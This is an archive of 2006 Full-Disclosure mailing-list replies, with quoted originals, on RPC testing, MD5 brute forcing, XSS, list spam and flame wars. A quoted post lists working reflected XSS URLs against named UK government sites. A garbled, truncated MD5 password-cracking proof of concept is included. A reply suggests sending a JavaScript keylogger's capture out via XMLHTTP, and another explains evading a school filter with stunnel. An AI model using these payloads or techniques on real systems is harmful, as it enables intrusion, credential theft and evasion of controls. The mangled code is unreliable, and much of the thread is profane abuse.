Re: [Full-disclosure] any tools for testing RPC
Im not sure theres any one product thatll do what you want. Setup a copy of Metasploit and try and run the RPC exploits, that probably going to give you the best coverage. Ed From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of 6ackpace Sent: 28 September 2006 08:09 To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] any tools for testing RPC hi all, I am testing RPC functionality in snort .i have tried all scripts and exploits available for RPC .but not so confident and wanna make sure my testing is done perfectly covering all aspects. can anyone plz tell me any tools which i can relay on to test RPC thank you ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] md5 attack: brute force 1/3 time faster thantraditional hash brute forcing
Every heard of rainbow tables? Brute
forcing MD5 is stoneage now.
From:
[EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]
On Behalf Of Slythers Bro
Sent: 23 August 2006 09:30
To:
full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] md5
attack: brute force 1/3 time faster thantraditional hash brute forcing
/*
MD5 recomputation proof of concept
coded by overdose
[EMAIL PROTECTED]
maybe need modification for big endian
bcc32 -O2 -6 fuckmd5.cpp
E:\UnxUtils\usr\local\wbincat
t.txt
dcvgc
E:\UnxUtils\usr\local\wbinmd5sum.exe t.txt
1c66bd6cc55e538103360ae67e5291c9 *t.txt
E:\UnxUtils\usr\local\wbin
E:\FUCKMD5bcc32 -O2
md5bf.cpp
Borland C++ 5.5.1 for Win32 Copyright (c) 1993, 2000
Borland
md5bf.cpp
:
Warning W8066 md5bf.cpp 350: Unreachable code in function main(int,char *
*)
Warning W8004 md5bf.cpp 351: 'compteur' is assigned a value that is never
used i
n function main(int,char *
*)
Warning W8004 md5bf.cpp 330: 'ii' is assigned a value that is never used
in func
tion main(int,char *
*)
Turbo Incremental Link 5.00 Copyright (c) 1997, 2000
Borland
E:\FUCKMD5md5bf.exe
1c66bd6cc55e538103360ae67e5291c9
MD5 recomputation proof of concept coded by overdose/[EMAIL PROTECTED] irc.worldnet.net
#mwa
fuckmd5.exe
hash
pass de 5
lettres
pass found :
dcvgc
E:\FUCKMD5
*/
#include
iostream.h
#define
CAR_CHAINE
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
static
unsigned char PADDING[64] = {
0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};
#define
UINT4 unsigned int
/* F, G and H are basic MD5 functions: selection, majority, parity */
#define F(x, y, z) (((x) (y)) | ((~x) (z)))
#define G(x, y, z) (((x) (z)) | ((y) (~z)))
#define H(x, y, z) ((x) ^ (y) ^ (z))
#define I(x, y, z) ((y) ^ ((x) | (~z)))
/*
ROTATE_LEFT rotates x left n bits */
#define ROTATE_LEFT(x, n) (((x) (n)) | ((x) (32-(n
#define ROTATE_RIGHT(x, n) (((x) (n)) | ((x) (32-(n
/* FF,
GG, HH, and II transformations for rounds 1, 2, 3, and 4 */
/* Rotation is separate from addition to prevent recomputation */
#define FF(a, b, c, d, x, s, ac) \
{(a) += F ((b), (c), (d)) + (x) + (unsigned int)(ac); \
(a) = ROTATE_LEFT ((a), (s)); \
(a) += (b); \
}
#define GG(a, b, c, d, x, s, ac) \
{(a) += G ((b), (c), (d)) + (x) + (unsigned int)(ac); \
(a) = ROTATE_LEFT ((a), (s)); \
(a) += (b); \
}
#define HH(a, b, c, d, x, s, ac) \
{(a) += H ((b), (c), (d)) + (x) + (unsigned int)(ac); \
(a) = ROTATE_LEFT ((a), (s)); \
(a) += (b); \
}
#define II(a, b, c, d, x, s, ac) \
{(a) += I ((b), (c), (d)) + (x) + (unsigned int)(ac); \
(a) = ROTATE_LEFT ((a), (s)); \
(a) += (b); \
}
//hehe
#define RHH(a, b, c, d, x, s, ac) \
{(a) -= b; \
(a) = ROTATE_RIGHT ((a), (s)); \
(a) -= H ((b), (c), (d)) + (x) + (unsigned int)(ac); \
}
#define RII(a, b, c, d, x, s, ac) \
{(a) -= (b); \
(a) = ROTATE_RIGHT ((a), (s)); \
(a) -= I ((b), (c), (d)) + (x) + (unsigned int)(ac); \
}
/* Round 1 */
#define S11 7
#define S12 12
#define S13 17
#define S14 22
/*
Round 2 */
#define S21 5
#define S22 9
#define S23 14
#define S24 20
/*
Round 3 */
#define S31 4
#define S32 11
#define S33 16
#define S34 23
/*
Round 4 */
#define S41 6
#define S42 10
#define S43 15
#define S44 21
inline unsigned int FastRecompute(UINT4 *buf, UINT4 *in)
{
UINT4 a = 0x67452301, b = 0xefcdab89, c = 0x98badcfe, d = 0x10325476;
d = buf[3] - d;
c = buf[2] - c;
b = buf[1] - b;
a = buf[0] - a;
RII ( b, c, d, a, in[ 9], S44, 3951481745); /* 64 */
RII ( c, d, a, b, in[ 2], S43, 718787259); /* 63 */
RII ( d, a, b, c, in[11], S42, 3174756917); /* 62 */
RII ( a, b, c, d, in[ 4], S41, 4149444226); /* 61 */
RII ( b, c, d, a, in[13], S44, 1309151649); /* 60 */
RII ( c, d, a, b, in[ 6], S43, 2734768916); /* 59 */
RII ( d, a, b, c, in[15], S42, 426432); /* 58 */
RII ( a, b, c, d, in[ 8], S41, 1873313359); /* 57 */
RII ( b, c, d, a, in[ 1], S44, 2240044497); /* 56 */
RII ( c, d, a, b, in[10], S43, 4293915773); /* 55 */
RII ( d, a, b, c, in[ 3], S42, 2399980690); /* 54 */
RII ( a, b, c, d, in[12], S41, 1700485571); /* 53 */
RII ( b, c, d, a, in[ 5], S44, 4237533241); /* 52 */
RII ( c, d, a, b, in[14], S43, 2878612391); /* 51 */
RII ( d, a, b, c, in[ 7], S42, 1126891415); /* 50 */
RII ( a, b, c, d, in[ 0], S41, 4096336452); /* 49 */
RHH ( b, c, d, a, in[ 2], S34, 3299628645); /* 48 */
RHH ( c, d, a, b, in[15], S33, 530742520); /* 47 */
RHH ( d, a, b, c, in[12], S32, 3873151461); /* 46 */
RHH ( a, b, c, d, in[ 9], S31, 3654602809); /* 45 */
return ((0x1fff a) | ( (0x1fff d) 16));
}
inline
bool FastTransform (UINT4 *buf, UINT4 *in, UINT4 lhash1,UINT4 lhash2)
{
UINT4 a = buf[0], b =
RE: [Full-disclosure] LOL HY
I'm glad somebody said it. I'm fed up of the whole if you don't like them, don't read them crap. It is a security list, last week I got 1200 e-mails from FD. I think I found around 90-100 that weren't spam/n3td3v/pr0n/assorted bullshit. These people take the piss and generally fuck things up for those here to learn and share. Every few months people ask that this list become moderated, every few months it breaks down into spam and anarchy thanks to a few wankers who have too much time on their hands. Fuck you all. I'm going to Bugtraq. Anybody else looking to stop this daily mailbox cleaning, should do so as well, it has become a FAR superior list nowadays anyway, mostly thanks to the people here driving real users away. Ed -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of mikeiscool Sent: 15 August 2006 07:56 To: Matt Burnett Cc: full-disclosure Subject: Re: [Full-disclosure] LOL HY On 8/15/06, Matt Burnett [EMAIL PROTECTED] wrote: What the fuck is my problem? I had to dl ~1MB of shitty porn, which prevents me from having 1.5 seconds more of decent high quality porn. Thats my fucking problem. Now the real question is what the fuck is your problem? If its so easy to not read these messages they why the fuck do you keep reading mine? So would you tell me what the the idea of fd is? Last time i read the charter it was supposed to be about security. Thats what the fuck the idea of FD is, mother fucking security, not shitty porn. Would you mind informing everyone here how crappy porn fits in to the idea of fd? BTW what is your convoluted idea of fd? see, now THIS is good tv. come on producers, where is the fd tv show ... -- mic ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] XSS funtime
No dude, XSS random sites is just lame. There is no competition, this kinda shit belongs on http://www.elitehackers.info. Not a SecList. Especially http://disabilitydatabase.mla.gov.uk, have you no shame? Ed From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of codeslagSent: 03 August 2006 23:09To: full-disclosure@lists.grok.org.ukSubject: [Full-disclosure] XSS funtime http://disabilitydatabase.mla.gov.uk/index.asp?startrow=1action="" http://www.audit-commission.gov.uk/search/search_result.asp?txtSearchKeywords=%3Cimg%20src=%22http://0xdeadface.co.uk/richard.jpg%22/%3E http://www.salford.gov.uk/search.htm?col=justhtmlqt=%3Cimg%20src=%22http://0xdeadface.co.uk/richard.jpg%22/%3E3E http://www.ealing.gov.uk/search.jsp?query=%3Cimg+src%3D%22http%3A%2F%2F0xdeadface.co.uk%2Frichard.jpg%22%2F%3EgoButton=Searchindex=all http://www.successforall.gov.uk/index.cfm?pg=61q=%3Cimg%20src=%22http://0xdeadface.co.uk/richard.jpg%22/%3E Does this mean I win the XSS contest? After all i have h40r3d t3h g1bs0n!!11hugs kisses dyn0/codeslag ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] CodeCrypter mutation engine
If you can't compile it, then how on earth do you expect to understand how to use it? I've thought compiling was more of an required intelligence test. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of /dev/null Sent: 20 July 2006 12:12 To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] CodeCrypter mutation engine Hello list, does any body know where I can find compiled version of CodeCrypter mutation engine writen by Tibbar? I have tried to compile with MS VC++6, but it doesn't compile. In case anybody would like to try, attached is source code... Thank you very much. -E. http://www.email.si/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] The truth about Rob Levin aka Liloof irc.freenode.net
Yes, shame on you. If Rob took you to court, you'd be in big fucking trouble. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Benjamin Krueger Sent: 05 July 2006 22:42 To: Slotto Corleone Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] The truth about Rob Levin aka Liloof irc.freenode.net Slotto Corleone wrote: Yes, Slotto Corleone has returned. However, this is only a message I've been given to relay to the list: Eyeballing Rob Levin Wowsa. Have you even talked to an attorney about your liability in exposing Rob's personal information on the public internet? It's one thing to try and discredit the man, but another (cruel and likely unlawful) thing entirely to try and destroy his identity and/or finances by exposing his SSN, birthdate, and other personal data. You have no right to try and cause that kind of harm, no matter what Rob has allegedly done. Shame on you. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Re: [WEB SECURITY] Cross Site Scripting inGoogle
For those who didn't read earlier: This isn't a bug, it's a feature. The URL specified is DESIGNED to redirect, e-mailing Google about it is simply going to make you look stupid. Ed -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Javor Ninov Sent: 06 July 2006 06:00 To: RSnake Cc: full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED]; bugtraq@securityfocus.com; [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: Re: [Full-disclosure] Re: [WEB SECURITY] Cross Site Scripting inGoogle RSnake wrote: Just for the record, I should clarify. Google was not notified of this exploit prior to full disclosure. As I said, they are notoriously slow (or completely delinquent) in fixing these issues historically. If you need proof click here to see four redirect issues disclosed nearly 6 months ago that are still not fixed. http://seclists.org/lists/webappsec/2006/Jan-Mar/0066.html Here's another one: http://www.google.com/url?sa=Dq=http://www.fthe.net Typically I don't believe in full disclosure as a release methodology (for instance, if I found a remote vulnerability in Microsoft, I wouldn't disclose that without giving Microsoft months to release a patch as they have taken their patching process very seriously as of late and their responsibility in this matter has been far improved). Either Google was not convinced when they were used as a phishing relay last time, or they do not take this seriously. Either way, it takes all but a few days to patch these issues in a website, QA them and releast them, and Google has not done so, making contacting the vendor a useless excersize to date, in my opinion. my opinion is that full disclosure is not for vendors .. it's for users. full disclosure is for us to know how to react on certain threads. i personally don't care about the vendors , although my company is a vendor itself . we also produce software and we also care about security of our software. but i expect users to post to security groups instead of mailing me personally. If the vendor cares about his users he should watch the security groups. I believe in FULL disclosure And i think this is the better way. -- Javor Ninov aka DrFrancky securitydot.net On Wed, 5 Jul 2006, [EMAIL PROTECTED] wrote: Did you even bother to email them and let them know? Being that they're still vulnerable probably not - z Google is vulnerable to cross site scripting attacks. I found a function built off their add RSS feed function that returns HTML if a valid feed is found. It is intended as an AJAXy (dynamic JavaScript anyway) call from an inline function and the page is intended to do sanitation of the function. However, that's too late, and it returns the HTML as a query string, that is rendered, regardless of the fact that it is simply a JavaScript snippet. Here is the post that explains the whole thing: http://ha.ckers.org/blog/20060704/cross-site-scripting-vulnerability -in-google/ -RSnake http://ha.ckers.org/ http://ha.ckers.org/xss.html http://ha.ckers.org/blog/feed/ The Web Security Mailing List: http://www.webappsec.org/lists/websecurity/ The Web Security Mailing List Archives: http://www.webappsec.org/lists/websecurity/archive/ http://www.webappsec.org/rss/websecurity.rss [RSS Feed] - Sponsored by: Watchfire Securing a web application goes far beyond testing the application using manual processes, or by using automated systems and tools. Watchfire's Web Application Security: Automated Scanning or Manual Penetration Testing? whitepaper examines a few vulnerability detection methods - specifically comparing and contrasting manual penetration testing with automated scanning tools. Download it today! https://www.watchfire.com/securearea/whitepapers.aspx?id=70150008 Vmm - - -R ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] All new anti-cyber terror website
I love the way you've actually definedthe word'intelligence'. Itherefore assume most of your visitors are not familiar with the term... Nuff said really. From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of n3td3vSent: 14 June 2006 18:04To: full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED]Subject: [Full-disclosure] All new anti-cyber terror website === For public distribution. === New website launched. === n3td3v group launched a new website last night and is ready for web traffic. === We pride ourselves in our continued work with the underworld at Google and Yahoo. === We are a professional group of users with good intentions. === Learn more about the all new n3td3v website today. === Is your corporation Googleor Yahoo? Have you ever wondered who is behind your security incidents?... === Its time for n3td3v, its time for http://n3td3v.googlepages.com === Remember to click on the security, intelligence and network link(s) at the top of the website! === Many Thanks, === n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Google blocked in China?
The Google API release conincided nicely with China's censorship. You can work it out ;) Thanks Google! -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Tonnerre Lombard Sent: 06 June 2006 08:28 To: Alice Bryson Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Google blocked in China? Salut, On Tue, 2006-06-06 at 15:20 +0800, Alice Bryson wrote: http://www.Google.com can not access these days in China? Is google's problem or other thing? Is there anyone know why? Google.com has always been blocked in the chinese address range. There is however a special website of Google China, but it deliveres country specific results, that is, filtered in some way. This is however nothing unusual, just the filters applied are different for different countries. Google does that due to a special contract, and they do it out of their free will. There is however a number of hacks around this, such as the elgooG mirror... Tonnerre -- SyGroup GmbH Tonnerre Lombard Loesungen mit System Tel:+41 61 333 80 33Roeschenzerstrasse 9 Fax:+41 61 383 14 674153 Reinach Web:www.sygroup.ch [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] abnormal behavior Gmail logon
This isn't abnormal or weird, It happens when your internet connection is fairly slow and its because you sometimes receive incomplete headers for the page (broken or garbled) Ed -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Oscar Fajardo Sent: 30 May 2006 21:37 To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] abnormal behavior Gmail logon Because loading.html is the first HTML page you request via browser when you log to gmail: GET /mail?gxlu=blahzx=blah HTTP/1.1 POST /accounts/ServiceLoginAuth HTTP/1.1 GET /accounts/CheckCookie?continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3F service=mailchtml=LoginDoneHtml HTTP/1.1 GET /mail/?auth=blah HTTP/1.1 GET /mail/?view=pagename=browserver=blah HTTP/1.1 GET /mail/?view=pagename=loadingver=blah HTTP/1.1 GET /favicon.ico HTTP/1.1 GET /mail/?view=pagename=jsver=3ee190b6dcef2cf0 HTTP/1.1 GET /mail/html/es/loading.html HTTP/1.1 I suppose that if he tries to get http://somehost/somepage.html the behaviour will be the same. Regards. - Original Message - From: Brian Eaton [EMAIL PROTECTED] To: Oscar Fajardo Sanchez [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED] Sent: Tuesday, May 30, 2006 10:06 PM Subject: Re: [Full-disclosure] abnormal behavior Gmail logon On 5/30/06, Oscar Fajardo Sanchez [EMAIL PROTECTED] wrote: Take a look at: HKEY_CURRENT_USER\Software\Classes\.htm You will see FirefoxHTML **if firefox is your default browser**. The server is just sending a html file, which, according to the registry of the client machine, has to be rendered by firefox.exe Any idea why the OP isn't seeing this happen on every web page? - Brian ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Black clouds over Sunnyvale go unchecked
What drugs are you taking, and where can I buy some? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of n3td3v Sent: 20 May 2006 19:53 To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Black clouds over Sunnyvale go unchecked yahoo hackers unite. yahoo is slowly but surely being taken over by a bad element of yahoo employee. these employees are hired by each other and fast tracked into sunnyvale. people say folks are vetted before they are employed, although you can never have a check for social background, the only checks possible are for criminal records. yahoo employee hackers don't have criminal records, they are highly interlligent folks, who have studied for years at universities. in real life its easier to define a criminal, but when we're talking about international hackers, there is no rule, there are no road signs. what is needed is intelligence on the bad guys from a social point of view. it is all very well using interviewing techniques, but with that, your intelligence gathered at a job interview is only as good as the would-be employee wants you to know. you cannot save yourself from hackers getting into yahoo. once a hacker is in yahoo, its very easy to gain the trust of co-workers. once given a job, it would take a hell of a lot of evidence to unstick them, and have grounds to fire them. i have intelligence on a social level of someone who is a blackhat, every attempt to tip off yahoo and make them convinced has failed, and you know what the worrying thing is, this guy has hosted interviews and has successfully hired more hackers. there is also intelligence that he wants in the long run to hire more folks from a blackhat social background. i instant messaged and have been e-mailing yahoo core security team for a sustained period over the issue of the particular employee, who so far has managed to divert attention from his activities by claiming everything is false being made against him. a bunch of losers with a grudge, bored kids, you know, any excuse the yahoo employee can think of to keep his reputation clean. although this guy tipped off a blackhat hacker that his im conversations were being monitored and this stopped further intelligence gathering techniques being used on the blackhat the yahoo employee tipped off. this tip-off wasn't a hear-say, there was actual proof he tipped off a blackhat being monitored. yahoo say for their security slogan yahoo takes security very seriously, though when its a threat from within, the yahoo employee is protected by his other evil blackhat friends from within the security team. to the whitehats of yahoo, they don't even know theres a blackhat movement going on within yahoo's work force, even though for a long time i've been trying to convince yahoo security team that the threat is real, and data is leaving sunnyvale and being sent to third party contacts. this yahoo employee was originally fast tracked into yahoo by another blackhat. since that time, the spawning of more blackhat insiders has been continuing. eventually yahoo will have an army of blackhat insiders letting third party contacts know exactly whats going on. its not to say theres no money in it, often top level google employees offer folks money for yahoo corporate data and the likes, and of course, if the price is right then who is going to say no? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] excessive xss vulnerabilities
Interesting, a JS keylogger! You should use XMLHTTP to post the info... From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Christian SwartzbaughSent: 09 May 2006 00:35To: full-disclosure@lists.grok.org.ukSubject: [Full-disclosure] excessive xss vulnerabilities there is a high volume of xss vulnerabilities on this list. take the next step to disclose why xss important for the affected program. for instance, creating a test case that does something privileged or malicious towards a visitor. in attempting to create a keystroke logger in _javascript_ i've found it drops random keystrokes (i think its a speed problem). and i would be interested in seeing more malicious _javascript_. again please justify why xss is valuable in disclosures of these vulnerabiltieseven if its just a cookie stealer, please show why an attacker would want those cookies or how he/she could use them to create a security issue. thanksfeofil ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Gary McKinnon
This is what is affectionally known as political punishment. Somebody who has nothing do with a terrorist sect, is threatened with The Bay. Feel big now do ya George? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of n3td3v Sent: 13 April 2006 15:39 To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Gary McKinnon It is believed human rights hacktivists are set to launch a response if British hacker Gary McKinnon is sent to Guantanamo Bay. Symantec are set to raise their ThreatCon level to warn administrators of the situation as the case comes to a climax next month. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] (no subject)
n3td3v, its not that we doubt that you're one of the best hackers in the ENTIRE world, nor do we doubt that your list is the finest around. its justthat we dont care. will you please just get off the fucking list. Ed From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of n3td3vSent: 31 March 2006 00:11To: full-disclosure@lists.grok.org.ukSubject: Re: [Full-disclosure] (no subject) Funny you should think FD isn't already moderated, our main [EMAIL PROTECTED] address has been moderated for months, hence the reason we're using [EMAIL PROTECTED] . This might be an interesting read for you "freedom of speech" Americans, who are currently bombing the hell out of the middle east to uphold, yet on FD, there is no democracy and freedom of _expression_... http://groups.google.com/group/n3td3v/browse_thread/thread/34e8f243bbddaf3e/ac7e9f73de66f10f http://groups.google.com/group/n3td3v/browse_thread/thread/64a322968d71fe3b/d3db5e88d9f91d88 http://groups.google.com/group/n3td3v/msg/5b3d7afe80dde4d3 Someone tell George W Bush todrop a bomb on John Cartwright's head, since he doesn't believe in "freedom", he must be aterrorist ;-) We ask John Cartwright to unmoderate [EMAIL PROTECTED] or you must be with the terrorists... and if you don't then someone might need to tell [EMAIL PROTECTED] and then you might get mentioned on his press conferences or radio addresses as being part of the "axis of evil". On 3/30/06, Anders B Jansson [EMAIL PROTECTED] wrote: Stan Bubrouski wrote: Name one powerful hacker kicked out of here?Just one.And you don't count (niether do I but I've never claimed to be an expert or important).Kicked from a public un-moderated mailing list?How?Now, if you don't like the noise, why don't you just shut the fuck up instead of answering the trolls?The noise isn't the idiot mailings, the noise is people who should know better answering the morons. _don't answer morons_ it serves no porpose.If someone posts something that is misguided or bad, then sure correct me (or us).But if someone posts something moronic, then please ignore.You're only helping the moron. I again refrain to the best proverb I've heard (and he's windows guru, shudder)"Don't argue with an idiot, he'll just drag the discussion to his level and beat you with experience."So, if someone post something silly or moronic, giggle, groan and delete. Do _not_ respond to prove that he (or remotely possibly she) is a moron,If we haven't got that already we have ourself to blame.Oh, and of course, this is for 'us', boring grayhats who want to read a clean list of the latest expliots every morning. Non-grayhats who want to annoy us are of course free to do so, after all, it is un-moderated and it's full-disclosure.So configure your frikken filters and stop responsing to idiots.// hdw___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] A Move to Remove
Guys, Please don't turn this into spam/flame/troll. This isa quick note to say, wouldall those who'd like n3td3v (the worlds greatest hacker andlegend in his own mind) to unsubscribe from this list, and not post again,please make it known. Thanks Ed ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
FW: [Full-disclosure] Secure HTTP
I did a simelar thing and used it to get around my school's filtering system. I'd wager he's trying to do something like this ;) Unfortuatly, what Julian says is correct, you'll need to bounce the connection through another server with stunnel forwarding the (now encrypted) connections back to your gateway. Which isn't too bad, all you need a halfway decent shell account (or just get a damn server) that'll allow backgroup procs. Just my 2 pence. Ed -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Brian Eaton Sent: 23 March 2006 15:40 To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Secure HTTP On 3/23/06, Julien GROSJEAN - Proxiad [EMAIL PROTECTED] wrote: Ok, but all his traffic on his network will be encrypted... no ? If the sites you are visiting don't support encryption, you are still going to end up with data in clear-text on the wire. Sure. It depends on who and what he is worried about. - Brian ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
FW: [Full-disclosure] Noise on the list
My friend, I posted an e-mail about this kind of thing a few months back. I was saddened to see no effect. I have something like 600 unread e-mail in my FD box, I'd say around 200 of them MAY be worth reading. I used to love this list, I subscribe to Bugtraq now. Nuff said. Ed -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Frederic Pasteleurs Sent: 21 March 2006 16:48 To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Noise on the list Hello everybody, I subscribed to this mailing list in 2004 just to keep me informed about some useful tips and the latest issues/problems in the software packages i'm using for my everyday computing habits. I had a hard time to keep up with the flow of mails in the beginning, but it was still manageable. The n3td3v trolling case several months ago was annoying, but still okay. Then came the fake advisories spamming, i was a bit pissed by the ammount of mails to delete, but didn't care much more than that. Then the animal porn drawings spamming: this time, i was seriously considering leaving the list and i felt sorry for the huge waste of valuable bandwidth and disk space. Now, i'm afraid to read any mail with the [Full-disclosure] header, because nowadays you have to dig through childish and mine-is-bigger-than-yours messages to actually find some interesting and valuable information. I know that's the price to pay for an unmoderated list, but the noise level reached a level i could not tolerate and i will leave this list by the end of the week. It seems that unmoderated list works only for mature people and those that keep silent when they have nothing to say... Come on people, how old are you ?? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
FW: [Full-disclosure] Noise on the list
I shouldn't have to get the fucking spamfilter involved when we're talking about a mailing list. Seriously, it takes the piss. What you said about idiots reponding to idiots is a very good point however. Ed -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Anders B Jansson Sent: 21 March 2006 17:13 To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Noise on the list Frederic Pasteleurs wrote: Hello everybody, I subscribed to this mailing list in 2004 just to keep me informed about some useful tips and the latest issues/problems in the software packages i'm using for my everyday computing habits. I had a hard time to keep up with the flow of mails in the beginning, but it was still manageable. The n3td3v trolling case several months ago was annoying, but still okay. Then came the fake advisories spamming, i was a bit pissed by the snip Come on people, how old are you ?? 43 1/2 And the spamming isn't that bad, 3-4 filter rules is needed but that's about it. The problem, if any, isn't the trolling but the moronic replies from people who should know better than responding to morons. Hello? If someone writes something stupid/silly/moronic then killfile/filter and/or ignore. Don't respond to it, you'll only make it worse. Or to quote ye olde proverb: Never argue with idiots, they'll just drag the discussion down to their own level and beat you with experience. -- // hdw ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] !ADVISORY! + +Thu Mar 16 14:28:51 EST 2006+ + Off-by-one in AOL Client Software
